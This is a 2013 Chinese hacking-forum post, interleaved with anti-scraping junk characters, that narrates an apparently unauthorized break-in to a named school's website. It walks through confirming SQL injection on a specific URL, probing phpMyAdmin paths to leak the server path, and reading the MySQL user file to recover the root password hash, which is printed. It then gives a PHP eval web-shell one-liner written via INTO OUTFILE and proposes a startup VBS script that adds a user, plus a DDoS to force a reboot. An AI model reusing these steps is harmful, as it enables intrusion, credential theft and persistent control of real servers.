中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
, }: e0 T" f) @6 O5 B发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!  v) Z6 T7 F0 Q
$ R! b; [* L: ^- F* `; E1 V7 x
0 [+ s/ i3 t' I: C* w- ~5 L( R

# i  \# J: t- b+ b& r$ K: J常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
' A3 O8 M& N$ l2 V' x3 R1 I" ]
# D$ l0 R+ j7 f, o& _那么想可以直接写入shell ,getshell有几个条件:' z. e6 d  d1 ?& W3 \
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
; R# v: b$ Z0 \! F1 s" ?0 E% |. O2 `5 Y% Y, [8 b9 ]5 B
试着爆绝对路径:
/ p# ]2 o% R- p1 [1./phpMyAdmin/index.php?lang[]=1  ' \- e1 i. E2 c. @1 X/ E
2./phpMyAdmin/phpinfo.php  
1 ^6 r+ S- ~) |# O* \1 O3./load_file()  : o) v: D% t$ @# w: O! C* F
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 R+ n1 n' F# b6 G. v5./phpmyadmin/libraries/select_lang.lib.php  2 T) Y4 L: c& M
6./phpmyadmin/libraries/lect_lang.lib.php  
0 f" ^* ^3 g# G" e7./phpmyadmin/libraries/mcrypt.lib.php   + A6 M; `: _$ ^, Y9 _7 V% O) e
8./phpmyadmin/libraries/export/xls.php  
" Q$ w2 M% r& m  v* d: T; ~; c; o* |. {2 x
均不行...........................
1 n* [8 {0 `8 B9 W! [! m# J. c1 Y+ ^* v7 ?0 |8 T2 E
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 o8 m3 y" }7 y' r1 Q' r6 h, V! e2 h9 o/ J( [8 F: J
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( P& }- I/ @- }
$ Z5 R$ s& p; F% e$ \" b默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
" Z5 g) p9 Q7 |( o
# a8 s6 c! ~' _' W, B' U敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........0 S" P$ n2 v  O3 Z3 _9 t% t
2 h% k* i$ r- o; x1 n
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 8 a) |) C5 q: A' u2 }
2 m1 y: p% t# k
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ) Y, M, H8 s4 \6 ?& _) b! l, S. ^$ L

. T# Y2 [" W) E自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD , j8 n8 d5 s) @
0 ?' w5 i3 k$ p% s* h7 ]3 A; E& W
成功读到root密码:# `) g) Q% m3 Q/ b2 `% U2 D9 ]% \

# A$ d+ S: H0 z9 I# l* Z17---- r(0072)" w' U! C6 X" C8 V
18---- o(006f)4 [. l$ H/ z3 p' E& |9 R$ j' Q# |4 F
19---- o(006f)4 X: s) T0 E5 J* X, y* Y
20---- t(0074)% H0 l1 {9 V" z6 K4 {
21---- *(002a)- H# `( [% m! l' S! B( J' @
22---- 8(0038)
$ D6 z4 G: \( Y2 i; d, m, t5 A23---- 2(0032). b! t# z/ [; K7 F# e/ \. j$ }! y
24---- E(0045)
& g  U% c% g' `6 w) S25---- 1(0031)
* M+ [* s# e* D  J+ o6 X# `' a26---- C(0043)' ~% V2 N3 D- l. z4 y: C$ n; s
27---- 5(0035)/ d  f) Z$ k7 T, c5 N" i4 e
28---- 8(0038)% v) Y- m; K, c; ~) I. K/ @
29---- 2(0032)
4 s2 v- a, H* a" ?30---- 8(0038)( Z) }* C1 ~% A/ Q7 F
31---- A(0041)
1 ?! ^8 Z! `+ \; y  a' w4 l% Z32---- 9(0039)1 X& v5 A/ A' a9 q! I
33---- B(0042)
- g- q/ e' U3 M- u" O34---- 5(0035)
: o3 b. s) p+ ~, H6 f1 z$ P9 R35---- 4(0034)
2 b) N: ?; H# P4 g# `' L36---- 8(0038)1 I. v7 L* \& \' H  m3 }/ j
37---- 6(0036)
4 W' `- w$ ~' I38---- 4(0034)5 c6 i8 K! @( ]5 t
39---- 9(0039)
, S/ j2 y/ m' F40---- 1(0031)
" d- y+ P" I; x- E2 [$ |& Z  D# A$ V41---- 1(0031)
# y8 a; F/ j8 i; k1 z$ q42---- 5(0035)1 J/ [+ {: t, p, Q/ h  [' h0 S
43---- 3(0033)
, |' i& [) V" x: n44---- 5(0035)" C  W$ i/ V, ]% r% {
45---- 9(0039)+ G  \6 T0 C$ c5 _, J; v0 N( O
46---- 8(0038)( R  E) P4 C3 Q7 q
47---- F(0046)
; d  n9 E: R6 a# q( n0 T% d48---- F(0046)/ g  d% e$ H* r8 [* [% r5 m4 o( j5 W
49---- 4(0034). t$ K: j" F2 _" g7 ~  d
50---- F(0046)  ?. n  ]8 R( W2 g6 F5 U6 \! j1 U
51---- 0(0030)9 D6 G8 I+ d# y8 N0 {2 U/ E; g3 m! i3 j
52---- 3(0033)3 f( [# e+ H3 D3 ~7 h. q; e: g! m
53---- 2(0032)
, i9 f% H, }% z$ I8 r% p54---- A(0041)
, P6 B7 j3 ^) z( z! J) N- H55---- 4(0034)
9 N, O* F4 w: p; F56---- A(0041)
% H' t( j! G/ F. k) _57---- B(0042)4 A' n1 ?- }% n, m; L
58---- *(0044)% c' B( X% ]/ _9 y
59---- *(0035)
4 G7 E* O" d% k& L60---- *(0041)
# X% J1 k6 }2 q  o8 f61---- *0032)
- `* N' k, D! q% }# k: x
* [5 u$ u' o- ?% B: K! o. P解密后成功登陆phpmyamin
  L# |. K$ I1 p4 f7 f! e2 G                          & `5 D! D' P- \) S& f
$ G  c1 s9 s" n( h0 N$ f& h
                             [attach]164[/attach]! }8 K- N6 n6 m6 ~4 x% e( U

+ n: W5 U& Q8 Y: F) ?  @找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'; j1 x+ T; T7 W3 E' y; C
) ]# Y* J& q+ `# R+ c% j
成功执行,拿下shell,菜刀连接:/ F" C  J. D3 M$ l
1 Q2 P- o) L6 l7 ]$ L# \
服务器不支持asp,aspx,php提权无果...................
& N* j+ X. C/ h* l+ E/ ^" p
' _% ~5 G2 w( l但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
, V7 p+ O0 b& N
服务器上已经有个隐藏帐号了

  G6 \  \$ y6 y* {
别名     administrators
7 y1 w) S! L2 q1 ~2 N5 U) M注释     管理员对计算机/域有不受限制的完全访问权
1 H, K/ A" K8 F5 `8 a, H# F7 y4 ^3 D. d
成员
/ g3 @' Y# ]$ q
-------------------------------------------------------------------------------
1 s" L! Y2 ~5 V" H9 G& Y3 Uadmin
2 I4 w# r' j. [+ `: qAdministrator
$ R3 x1 ~6 y% ?* Z5 ^9 Fslipper$
( Y, |* d0 S9 E" z6 f$ V( asqluser" ]$ {2 m$ E. e) Q
命令成功完成。
, O! N" L, A) E" `+ a; V* Q7 k1 N# a3 [1 G
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
( p# a9 G8 @4 x$ ~$ C6 c' i$ ?  S& a) r/ o+ U! c
ddos服务器重启,不然就只能坐等服务器重启了...............................
0 M1 p8 t' }) f+ m
' [  j/ T5 d" L' H8 O0 f      
5 p' k% }! z: E7 l5 ~

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2